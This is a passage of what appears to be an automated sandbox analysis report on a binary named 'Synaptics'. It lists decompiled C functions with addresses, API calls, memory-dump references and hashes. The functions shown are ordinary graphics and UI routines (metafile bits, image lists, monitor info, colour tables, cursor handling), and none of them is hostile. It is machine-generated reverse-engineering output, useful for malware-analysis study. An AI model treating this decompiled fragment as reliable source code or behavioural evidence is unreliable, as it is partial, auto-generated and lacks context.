					_push(0x4289cf);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00425FB8(_t67);
					}
					E0041D904(_t80, 0x16,  &_v38);
					E0041D904(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4289d6);
					return E0040277C(_v8);
				}
			}






















                                                                                                                                                                                                                            0x004288b5
                                                                                                                                                                                                                            0x004288b7
                                                                                                                                                                                                                            0x004288bc
                                                                                                                                                                                                                            0x004288be
                                                                                                                                                                                                                            0x004288c4
                                                                                                                                                                                                                            0x004289fb
                                                                                                                                                                                                                            0x004288ca
                                                                                                                                                                                                                            0x004288d4
                                                                                                                                                                                                                            0x004288d9
                                                                                                                                                                                                                            0x004288dc
                                                                                                                                                                                                                            0x004288e3
                                                                                                                                                                                                                            0x004288ea
                                                                                                                                                                                                                            0x004288f4
                                                                                                                                                                                                                            0x004288ec
                                                                                                                                                                                                                            0x004288ec
                                                                                                                                                                                                                            0x004288ec
                                                                                                                                                                                                                            0x0042890b
                                                                                                                                                                                                                            0x00428922
                                                                                                                                                                                                                            0x00428929
                                                                                                                                                                                                                            0x0042892e
                                                                                                                                                                                                                            0x00428932
                                                                                                                                                                                                                            0x00428934
                                                                                                                                                                                                                            0x00428939
                                                                                                                                                                                                                            0x0042893e
                                                                                                                                                                                                                            0x0042893f
                                                                                                                                                                                                                            0x00428944
                                                                                                                                                                                                                            0x00428947
                                                                                                                                                                                                                            0x0042895d
                                                                                                                                                                                                                            0x00428968
                                                                                                                                                                                                                            0x0042896d
                                                                                                                                                                                                                            0x0042896e
                                                                                                                                                                                                                            0x00428973
                                                                                                                                                                                                                            0x00428976
                                                                                                                                                                                                                            0x00428993
                                                                                                                                                                                                                            0x00428995
                                                                                                                                                                                                                            0x00428995
                                                                                                                                                                                                                            0x004289a4
                                                                                                                                                                                                                            0x004289b1
                                                                                                                                                                                                                            0x004289b8
                                                                                                                                                                                                                            0x004289bb
                                                                                                                                                                                                                            0x004289be
                                                                                                                                                                                                                            0x004289ce
                                                                                                                                                                                                                            0x004289ce

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BitsFileMeta
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 858000408-2679148245
                                                                                                                                                                                                                            • Opcode ID: 758f6c39527f4397bb5ac8e9337bbea5d287d3cdd1cc4b9367fbb58d6a4b21e7
                                                                                                                                                                                                                            • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 758f6c39527f4397bb5ac8e9337bbea5d287d3cdd1cc4b9367fbb58d6a4b21e7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00448DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                                            			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x49eba0 == 0) {
					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
					if( *0x49eba0 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00422634(_t43, 1, 0);
				_push(_t45);
				_push(0x448ebe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x49eba4 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00447D0C(_t28);
					_push(_t11);
					L0042C4AC();
					if(_t11 == 0) {
						_t33 =  *0x49d9c8; // 0x422f10
						E0040D200(_t33, 1);
						E00404378();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00447D0C(_t28));
					if( *0x49eba4() != 0) {
						_t34 =  *0x49d9c8; // 0x422f10
						E0040D200(_t34, 1);
						E00404378();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x448ec5);
				return E00403BEC(_v8);
			}
















                                                                                                                                                                                                                            0x00448dc5
                                                                                                                                                                                                                            0x00448dc8
                                                                                                                                                                                                                            0x00448dcb
                                                                                                                                                                                                                            0x00448dcd
                                                                                                                                                                                                                            0x00448dd6
                                                                                                                                                                                                                            0x00448de2
                                                                                                                                                                                                                            0x00448df1
                                                                                                                                                                                                                            0x00448dfd
                                                                                                                                                                                                                            0x00448e01
                                                                                                                                                                                                                            0x00448e0e
                                                                                                                                                                                                                            0x00448e0e
                                                                                                                                                                                                                            0x00448e01
                                                                                                                                                                                                                            0x00448df1
                                                                                                                                                                                                                            0x00448e23
                                                                                                                                                                                                                            0x00448e28
                                                                                                                                                                                                                            0x00448e29
                                                                                                                                                                                                                            0x00448e2e
                                                                                                                                                                                                                            0x00448e31
                                                                                                                                                                                                                            0x00448e3b
                                                                                                                                                                                                                            0x00448e75
                                                                                                                                                                                                                            0x00448e7a
                                                                                                                                                                                                                            0x00448e7c
                                                                                                                                                                                                                            0x00448e7c
                                                                                                                                                                                                                            0x00448e7f
                                                                                                                                                                                                                            0x00448e82
                                                                                                                                                                                                                            0x00448e87
                                                                                                                                                                                                                            0x00448e88
                                                                                                                                                                                                                            0x00448e8f
                                                                                                                                                                                                                            0x00448e91
                                                                                                                                                                                                                            0x00448e9e
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e42
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e47
                                                                                                                                                                                                                            0x00448e48
                                                                                                                                                                                                                            0x00448e51
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448e5c
                                                                                                                                                                                                                            0x00448e69
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448eaa
                                                                                                                                                                                                                            0x00448ead
                                                                                                                                                                                                                            0x00448eb0
                                                                                                                                                                                                                            0x00448ebd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC1500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                                                                                                                                                                                            • 73751DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73751AddressC1500HandleModuleProc
                                                                                                                                                                                                                            • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                                                                                                            • API String ID: 3699963180-3125200627
                                                                                                                                                                                                                            • Opcode ID: 028d70da097bf102ce3fdd8d86104c966a5ad625aa96c2d517d76ee05a24afb6
                                                                                                                                                                                                                            • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 028d70da097bf102ce3fdd8d86104c966a5ad625aa96c2d517d76ee05a24afb6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C900 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e914; // 0x42c900
					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e914(_t27, _t29);
				}
				return _t24;
			}














                                                                                                                                                                                                                            0x0042c909
                                                                                                                                                                                                                            0x0042c90c
                                                                                                                                                                                                                            0x0042c916
                                                                                                                                                                                                                            0x0042c93b
                                                                                                                                                                                                                            0x0042c943
                                                                                                                                                                                                                            0x0042c963
                                                                                                                                                                                                                            0x0042c968
                                                                                                                                                                                                                            0x0042c973
                                                                                                                                                                                                                            0x0042c97e
                                                                                                                                                                                                                            0x0042c988
                                                                                                                                                                                                                            0x0042c989
                                                                                                                                                                                                                            0x0042c98a
                                                                                                                                                                                                                            0x0042c98b
                                                                                                                                                                                                                            0x0042c98c
                                                                                                                                                                                                                            0x0042c98d
                                                                                                                                                                                                                            0x0042c997
                                                                                                                                                                                                                            0x0042c999
                                                                                                                                                                                                                            0x0042c9a1
                                                                                                                                                                                                                            0x0042c9a2
                                                                                                                                                                                                                            0x0042c9a2
                                                                                                                                                                                                                            0x0042c9a7
                                                                                                                                                                                                                            0x0042c9a7
                                                                                                                                                                                                                            0x0042c918
                                                                                                                                                                                                                            0x0042c91d
                                                                                                                                                                                                                            0x0042c92a
                                                                                                                                                                                                                            0x0042c937
                                                                                                                                                                                                                            0x0042c937
                                                                                                                                                                                                                            0x0042c9b1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C96D
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C978
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                                                                                                            • API String ID: 2545840971-1370492664
                                                                                                                                                                                                                            • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C9D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e918; // 0x42c9d4
					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e918(_t27, _t29);
				}
				return _t24;
			}














                                                                                                                                                                                                                            0x0042c9dd
                                                                                                                                                                                                                            0x0042c9e0
                                                                                                                                                                                                                            0x0042c9ea
                                                                                                                                                                                                                            0x0042ca0f
                                                                                                                                                                                                                            0x0042ca17
                                                                                                                                                                                                                            0x0042ca37
                                                                                                                                                                                                                            0x0042ca3c
                                                                                                                                                                                                                            0x0042ca47
                                                                                                                                                                                                                            0x0042ca52
                                                                                                                                                                                                                            0x0042ca5c
                                                                                                                                                                                                                            0x0042ca5d
                                                                                                                                                                                                                            0x0042ca5e
                                                                                                                                                                                                                            0x0042ca5f
                                                                                                                                                                                                                            0x0042ca60
                                                                                                                                                                                                                            0x0042ca61
                                                                                                                                                                                                                            0x0042ca6b
                                                                                                                                                                                                                            0x0042ca6d
                                                                                                                                                                                                                            0x0042ca75
                                                                                                                                                                                                                            0x0042ca76
                                                                                                                                                                                                                            0x0042ca76
                                                                                                                                                                                                                            0x0042ca7b
                                                                                                                                                                                                                            0x0042ca7b
                                                                                                                                                                                                                            0x0042c9ec
                                                                                                                                                                                                                            0x0042c9f1
                                                                                                                                                                                                                            0x0042c9fe
                                                                                                                                                                                                                            0x0042ca0b
                                                                                                                                                                                                                            0x0042ca0b
                                                                                                                                                                                                                            0x0042ca85

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA41
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA4C
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                                                                                                            • API String ID: 2545840971-2774842281
                                                                                                                                                                                                                            • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00428F38 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E004267F4(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00407638();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L004072E0();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x428fe7);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x428fee);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407888();
						return _t31;
					}
				}
			}

















                                                                                                                                                                                                                            0x00428f38
                                                                                                                                                                                                                            0x00428f39
                                                                                                                                                                                                                            0x00428f3b
                                                                                                                                                                                                                            0x00428f43
                                                                                                                                                                                                                            0x00428f46
                                                                                                                                                                                                                            0x00428f4a
                                                                                                                                                                                                                            0x00428fee
                                                                                                                                                                                                                            0x00428ff3
                                                                                                                                                                                                                            0x00428f5b
                                                                                                                                                                                                                            0x00428f69
                                                                                                                                                                                                                            0x00428f6e
                                                                                                                                                                                                                            0x00428f72
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00428f74
                                                                                                                                                                                                                            0x00428f74
                                                                                                                                                                                                                            0x00428f76
                                                                                                                                                                                                                            0x00428f7b
                                                                                                                                                                                                                            0x00428f7e
                                                                                                                                                                                                                            0x00428f81
                                                                                                                                                                                                                            0x00428f82
                                                                                                                                                                                                                            0x00428f87
                                                                                                                                                                                                                            0x00428f94
                                                                                                                                                                                                                            0x00428f99
                                                                                                                                                                                                                            0x00428f9a
                                                                                                                                                                                                                            0x00428f9f
                                                                                                                                                                                                                            0x00428fa2
                                                                                                                                                                                                                            0x00428fb3
                                                                                                                                                                                                                            0x00428fba
                                                                                                                                                                                                                            0x00428fbd
                                                                                                                                                                                                                            0x00428fc0
                                                                                                                                                                                                                            0x00428fcd
                                                                                                                                                                                                                            0x00428fd6
                                                                                                                                                                                                                            0x00428fdb
                                                                                                                                                                                                                            0x00428fde
                                                                                                                                                                                                                            0x00428fdf
                                                                                                                                                                                                                            0x00428fe1
                                                                                                                                                                                                                            0x00428fe6
                                                                                                                                                                                                                            0x00428fe6
                                                                                                                                                                                                                            0x00428f72

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004267F4: GetObjectA.GDI32(?,?), ref: 0042680B
                                                                                                                                                                                                                              • Part of subcall function 004267F4: 73C9AEA0.GDI32(?,00000000,?,?,?,?,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00428F76
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,00000000), ref: 00428F82
                                                                                                                                                                                                                            • SelectObject.GDI32(?), ref: 00428F8F
                                                                                                                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00428FCD
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00428FD6
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 980243606-0
                                                                                                                                                                                                                            • Opcode ID: 0ebad56f2c6e6d691b04411e0281d05579cb4a1ae04eb320be2d1e6186d7cc52
                                                                                                                                                                                                                            • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ebad56f2c6e6d691b04411e0281d05579cb4a1ae04eb320be2d1e6186d7cc52
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458714 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00458714(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				_t1 = _t19 + 0x44; // 0x0
				if(__edx ==  *_t1) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004586EC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                                                                                                                                                                                            0x00458714
                                                                                                                                                                                                                            0x00458714
                                                                                                                                                                                                                            0x00458718
                                                                                                                                                                                                                            0x0045871b
                                                                                                                                                                                                                            0x0045871d
                                                                                                                                                                                                                            0x0045871f
                                                                                                                                                                                                                            0x00458723
                                                                                                                                                                                                                            0x00458798
                                                                                                                                                                                                                            0x00458798
                                                                                                                                                                                                                            0x00458725
                                                                                                                                                                                                                            0x00458725
                                                                                                                                                                                                                            0x0045872c
                                                                                                                                                                                                                            0x00458788
                                                                                                                                                                                                                            0x00458793
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045872e
                                                                                                                                                                                                                            0x0045872f
                                                                                                                                                                                                                            0x00458734
                                                                                                                                                                                                                            0x00458741
                                                                                                                                                                                                                            0x00458745
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00458747
                                                                                                                                                                                                                            0x0045874a
                                                                                                                                                                                                                            0x00458758
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045875a
                                                                                                                                                                                                                            0x00458781
                                                                                                                                                                                                                            0x00458781
                                                                                                                                                                                                                            0x00458758
                                                                                                                                                                                                                            0x00458745
                                                                                                                                                                                                                            0x0045872c
                                                                                                                                                                                                                            0x004587a1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32 ref: 0045872F
